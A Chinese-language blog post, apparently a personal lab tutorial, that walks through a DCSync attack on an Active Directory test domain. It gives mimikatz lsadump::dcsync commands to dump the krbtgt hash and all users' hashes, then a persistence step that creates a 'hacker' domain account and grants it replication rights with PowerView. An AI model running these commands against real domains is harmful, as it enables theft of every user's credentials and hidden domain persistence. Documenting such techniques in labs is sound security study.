域凭证获取——DCSync

于 2024-08-06 09:03:36 发布
阅读量746 收藏 8
点赞数 23
分类专栏: 内网渗透 文章标签: 网络安全 windows
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_55202378/article/details/140921799
版权

文章目录

在这里插入图片描述
攻击机kali IP:192.168.111.0
跳板机win7 IP:192.168.111.128,192.168.52.143
靶机win server 2008 IP:192.168.52.138

一、DCSync简介

在一个大型网络中往往存在多台域控制器(DC),每台DC都需要保持最新的凭证,而保持最新凭证的方法就是在各个域控制器之间进行数据共享,共享用户凭证、安全描述符等域内变更信息。于是微软推出了目录复制服务,这个服务让域控制器可以在其他域控制器进行任何修改时进行更新。例如,DC1新增了一个名为test的域用户,那么DC2就可以通过该服务的自身同步功能同时更新test用户。

DCSync就是伪装域控制器并使用DSGetNCChanges函数来请求其他域控制器获取域内的用户凭证。DCSync攻击已经被集成到mimikatz中,在使用DCSync时mimikatz会自动模拟域控制器,并要求其他域控制器使用Microsoft目录复制服务远程协议(MS-DRSR)来获取域内用户凭证,它可以通过这些手段要求其他域控制器将NTDS.DIT信息同步给自身模拟的域控制器。特别注意:对于这些操作,无需在域控制器上执行任何一条命令

二、利用DCSync获取域内用户哈希

执行DCSync攻击的域用户必须具有复制目录更改所有项权限(Replicating Directory Changes All)和复制目录更改权限(Replicating Directory Changes),而在域内默认拥有有两种权限的用户如下:

  • 域控制器本地管理员组
  • 域管理员组
  • 企业管理员组
  • 域控制器计算机账户

1、这里win 7作为域内主机,同时使用域内成员god\test登录win 7;该域成员并非域管理员,但在域内拥有“复制目录更改”和“复制目录更改所有项”权限。

在AD管理中心点击域的属性
在这里插入图片描述
先添加当前域成员,在授权相应的权限。
在这里插入图片描述

2、利用该用户执行mimikatz的DCSync功能以获取指定域成员哈希。这里尝试获取krbtgt用户的凭证,该用户是获取黄金票据是的重要用户。命令如下:

# 获取域内krbtgt用户的哈希
mimikatz.exe "lsadump::dcsync /domain:god.org /user:krbtgt" exit

在这里插入图片描述

3、获取域内所有用户的哈希

# 获取域内所有用户的哈希
mimikatz.exe "lsadump::dcsync /domain:god.org /all /csv" exit

在这里插入图片描述

三、DCSync可逆加密利用(没搞定)

当用户账号设置ReverseiblePasswordEncryption(可逆加密)属性后,攻击者可以直接获取该用户的明文密码。前提是该域用户在设置可逆加密属性后修改过密码

# 为test域用户设置可逆加密属性
Set-ADUser test -AllowReversiblePasswordEncryption $true

老是报错
在这里插入图片描述

设置该属性后,使用mimikatz获取该域用户的明文密码。

lsadump::dcsync /domain:god.org /user:test

四、域外利用DCSync获取域用户哈希(待完成)

待完成。

五、利用ACL滥用进行DCSync持久化

如果想进行DCSync攻击,所用的账号需要有DS-Replication-Get-ChangesDS-Replication-Get-Changes-All这两个权限。DCSync攻击可用于持久化工作中

下面的实验是在域控win server 2008上完成,假设已经拿到域管的账号密码。下一步进行权限维持。
1、执行下面的命令新建一个域用户,并赋予“复制目录更改”和“复制目录更改所有项”两个权限。

# 域内新建用户
# net user <username> <password> /add /domain
net user hacker admin123. /add /domain

# 域内删除用户
# net user <username> /del /domain
net user hacker /del /domain

在这里插入图片描述

import-module .\Powerview.ps1 # 导入Powerview.ps1
Add-DomainObjectAcl -TargetIdentity "DC=god,DC=org" -PrincipalIdentity hacker -Rights DCSync -Verbose
# DC=god,DC=org:代表god.org,即域名
# -PrincipalIdentity:指定所需添加到域的用户名
# -Rights:指定需要获取的权限
# -Verbose:显示详细运行信息

在这里插入图片描述
在这里插入图片描述
2、使用god\hacker登录域内机器,并进行DCSync攻击。

mimikatz.exe "lsadump::dcsync /domain:god.org /all /csv" exit

在这里插入图片描述

3、如果想要查询域内哪些用户拥有“复制目录更改”和“复制目录更改所有项”两个权限。使用如下命令(下图实在域控上执行的,管理员打开powershell):

# 获取拥有“复制目录更改”和“复制目录更改所有项”两个权限的用户
import-module .\Powerview.ps1 # 导入Powerview.ps1
Find-InterestingDomainAcl -ResolveGUIDs | ?{$_.ObjectAceType -match "DS-Replication-Get-Changes"} # 需要域管账号

在这里插入图片描述

PT_silver
关注
  • 23
    点赞
  • 8
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
内网 —— 跨攻击
战神/calmness的博客
12-09 752
目录 跨攻击的方法 利用信任关系的跨攻击 信任关系 获取信息 利用信任密钥获取目标的权限 利用krbtgt 散列值获取目标的权限 外部信任和林信任 利用无约束委派 和 MS-RPRN 获取信任林权限 防范跨攻击 跨攻击的方法 都有自己的内网,一般通过林进行共享资源。根据不同职能区分 利用信任关系的跨攻击 信任关系 获取信息 利用信任密钥获取目标的权限 ...
渗透——获取用户明文密码
Ping_Pig的博客
04-23 3721
目录 讲在前面: 一、CredSSP获取明文密码 二、Dcsync获取明文密码 讲在前面: 本文是笔者在学习"三好学生"前辈的文章进而总结的一篇文章,内容主要是在内网渗透中获得明文密码的两种方式。,在笔者看来,两种办法都有一定的限制性和局限性,当然还有其他的办法,这需要笔者进一步的继续深入学习从而总结。 一、CredSSP获取明文密码 CredSSP的研究文章的文章通过CredSSP导出用户的明文口令。这篇文章已经分析的非常清楚如何使用,以及使用的场景,当然优缺点也给大家进行了展示,这里不做赘
渗透测试——管用户冒充备份获取ntds.dit
weixin_74171325的博客
06-19 352
【代码】渗透测试——管用户冒充备份获取ntds.dit。
渗透-控维权
m0_58596609的博客
11-19 2094
渗透-控维权
【基础篇】————28、横向渗透
Fly_鹏程万里
05-27 2777
0x00 端口渗透 端口扫描 端口的指纹信息(版本信息) 端口所对应运行的服务 常见的默认端口号 .尝试弱口令 端口爆破 hydra 端口弱口令 NTScan Hscan 自写脚本 端口溢出 smb ms08067 ms17010 ms11058 ... apacheftp... 常见的默认端口 1、web类(web漏洞/敏感目录) 第三方通用组...
相关基础知识
天在等我,菜鸟想飞
12-30 7645
基础知识 工作组(Work Group) 工作组是局网中的一个概念,由许多在同一物理地点,而且被相同的局网连接起来的用户组成的小组,也可以是遍布一个机构的,但却被同一网络连接的用户构成的逻辑小组。工作组是最常见最简单最普通的资源管理模式,就是将不同的电脑按功能分别列入不同的组中,加入工作组是为了区分用户计算机在网络中的类别,如果用户有工作组的话,在管理上会方便很多,可以共享/使用打印机和协和工作,很多小企业都是用这种方法来管理电脑,共享文件。 工作组环境中的登录验证过程:工作组网络也称为“对等式”的网
渗透总结
2201_75378806的博客
04-16 489
总结
Cobalt Strike使用教程——基础篇
Captain_RB的博客
06-10 1万+
本文主要介绍 **Cobalt Strike** 4.3 的基本功能及使用方法
内网渗透神器(Mimikatz)——使用教程
热门推荐
W小哥
04-16 6万+
一、工具简介 Mimikatz是法国人benjamin开发的一款功能强大的轻量级调试工具,本意是用来个人测试,但由于其功能强大,能够直接读取WindowsXP-2012等操作系统的明文密码而闻名于渗透测试,可以说是渗透必备工具。 二、Mimikatz命令 cls: 清屏 standard: 标准模块,基本命令 crypto: 加密相关模块 sekurlsa: 与证书相关的模块 kerberos: kerberos模块 privilege: 提权相关模块 process: 进程相关
环境添加网络共享登录凭证
03-10
环境添加网络共享登录凭证 登录需要输入用户名与密码的解决方法
凭证——收付转凭证样本.doc
11-06
收付转凭证是会计工作中非常基础且重要的工具,主要用于记录企业日常经济业务的财务收支情况。以下是关于收付转凭证的详细知识: 1. 收款凭证:收款凭证是用来记录企业收到现金或银行存款增加的凭证,一般发生在...
获取Tableau集成时的免登陆凭证
06-08
获取Tableau凭证,实现报表在第三方的免登陆。 第一步:在Tableau服务器上命令行设置授信白名单配置白名单 第二步:这里使用java发送请求,其他方式也可:如php。将返回值返回客户端页面 第三步:页面嵌入报表路径...
畅捷通T+凭证接口生成凭证
10-27
在畅捷通T+系统中,凭证接口生成凭证是指通过T+系统的凭证接口,生成各种类型的凭证,例如期间损益凭证、汇兑损益凭证、自定义凭证等。该功能能够快速生成大量的凭证数据,提高会计工作效率,并且能够与其他系统集成...
一文解读,网络安全行业人才需求情况《网络安全产业人才发展报告》
weixin_59086772的博客
10-18 8374
随着近几天国家网络安全宣传周在全国各地开展活动,网络安全再一次成为热门话题。网络安全不再缩在小小的安全圈子里,惠及面越来越广。不少对网络安全颇有兴趣的朋友非常关心行业前景如何?该怎么提升自我能力,更快地加入网安行列。 今天雨笋君就10月13日在网络安全宣传周上发布的《2021网络安全人才报告》进行一个简单的行业前景分析。 一、网络安全行业市场发展情况 网络时代生活越来越离不开网络,与此同时发生的网络安全攻击事件、非法入侵等等一系列事件都威胁着普通人的生活。没有网络安全保障,个人和企业等重.
SpringBoot基础 第一天
最新发布
2301_80034662的博客
08-05 577
Person类中利用ConfigurationProperties(prefix=" ")引入配置类中的元素 但是注意Person类中的类的名字必须与application.yaml中一致。如果不是标准的application.properties 是其他的Person类中需要用PropertySource来添加配置文件的路径。给容器中添加组件,将方法的返回值添加到容器中 容器中这个组件的默认ID就是方法名。的配置文件,我们自己编写的配置文件,也不能自动识别;的配置文件,让配置文件里面的内容生效;
Linux学习笔记:Linux基础知识汇总(个人复习版)
欢迎相互探讨交流知识呀~
08-05 1416
使用fdisk -l查看分区挂载情况,或者查看/etc/mtab文件,然后找到最接近的挂载点信息。4、创建站点主页 【eg.在/var/www/html内新建index.html】write_enable=YES//ftp可写,即上传权限;下载权限是默认赋予的。将数据同步写入硬盘中的指令,在关机之前输入,可以多输几次。使用df命令,如df -h,查看磁盘分区的挂载点。使用lsblk命令,查看系统的磁盘设备使用情况。-a:显示所有文件(包括隐藏文件),简洁版。-R:显示所有文件以及子目录下文件,简洁版。
C#中的foreach和自定义比较
weixin_64532720的博客
08-05 1886
在C#中,如果你想要使用自己定义的排序方式,你可以实现或IComparer接口,然后使用这个实现来自定义排序逻辑。以下是如何实现定义学生类set;set;​Age = age;实现 IComparer 接口// 根据年龄进行升序排序使用自定义比较器对集合进行排序​// 创建自定义比较器的实例​// 使用自定义比较器对集合进行排序如果你想要实现降序排序,可以在Compare// 根据年龄进行降序排序或者,你可以创建两个不同的比较器类,一个用于升序,一个用于降序。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值